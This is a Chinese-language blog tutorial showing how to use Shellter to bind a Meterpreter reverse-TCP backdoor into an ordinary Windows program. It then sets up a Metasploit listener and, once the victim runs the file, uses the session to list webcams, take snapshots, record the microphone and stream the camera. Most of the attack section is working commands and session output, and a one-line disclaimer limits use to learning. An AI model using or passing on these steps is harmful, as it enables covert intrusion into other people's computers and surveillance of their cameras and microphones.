使用反向shell控制摄像头
9unk Lv5

环境

系统:Kali、windows 10 (电脑上带摄像头)

软件:shellter(kali 默认安装)

注:关闭防火墙和杀毒软件

操作

  1. 将任意 PE 软件,放到 Kali 系统中

  2. 运行 shellter

1
2
root@kali:/home/SHELL# shellter

  1. 在 shellter 弹窗中输入 A(Auto,自动添加后门),第二行输入 PE 软件的存放路径

shellter-1.png

  1. 这里提示:是否添加一个后门模块,这里选择 “ Y “

shellter-2.png

  1. 首先输入 “ L “ ,然后输入模块编号 “ 1 “(meterpreter_reverse_tcp),最后输入我们需要监听的 地址(kali 系统的ip)和端口号。

shellter-3.png

  1. 末尾没有报错,说明后门已经写入成功

shellter-4.png

  1. 打开 msf,并监听地址和端口
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:/home/SHELL# msfconsole

msf5 > use multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.124.26

LHOST => 192.168.124.26

msf5 exploit(multi/handler) > set LPORT 4444

LPORT => 4444

msf5 exploit(multi/handler) > run
  1. 将添加好后门的 PE 软件,放到 windows 10 系统中并运行。

  2. msf 监听到了会话,并进行摄像头操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
// ** 将添加了后门的软件,放到 windwos 中,并运行.出现如下内容,说明反向shell已经成功 ** //

[*] Started reverse TCP handler on 192.168.124.26:4444
[*] Sending stage (179779 bytes) to 192.168.124.25
[*] Meterpreter session 1 opened (192.168.124.26:4444 -> 192.168.124.25:1773) at 2019-08-23 00:40:53 +0800

// ** 查看摄像头 ** //

meterpreter > webcam_list
1: Chicony USB2.0 Camera

// ** 用摄像头进行拍照 ** //

meterpreter > webcam_snap -i 1
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/sUqFcfWF.jpeg
meterpreter > gimp_device_info_set_device: trying to set GdkDevice 'VirtualPS/2 VMware VMMouse' on GimpDeviceInfo which already has a device

// ** 录制声音 ** //

meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /root/fSAEXVSs.wav

// ** 开启摄像头(在 /var/www//webcam.htm 中可以看到截取的图片) ** //

meterpreter > run webcam -p /var/www/

[!] Meterpreter scripts are deprecated. Try post/windows/manage/webcam.
[!] Example: run post/windows/manage/webcam OPTION=value [...]
[*] Starting webcam 1: Chicony USB2.0 Camera
[*] imagepath is /var/www//webcam-00000.jpg
[*] View live stream at: /var/www//webcam.htm
[*] Image saved to : /var/www//webcam-00000.jpg
[8243:8243:0823/004940.714044:ERROR:zygote_host_impl_linux.cc(89)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180

// ** 关闭摄像头 ** //

run webcam -s

不得将本文用作违法犯罪目的,本文只用作技术分享交流学习使用。

reference

使用反向Shell控制摄像头

meterpreter后渗透之摄像头和录音详细用法

屌丝绅士-后门捆绑工具-shellter

  • 本文标题:使用反向shell控制摄像头
  • 本文作者:9unk
  • 创建时间:2019-08-22 17:11:07
  • 本文链接:https://9unkk.github.io/2019/08/22/shi-yong-fan-xiang-shell-kong-zhi-she-xiang-tou/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!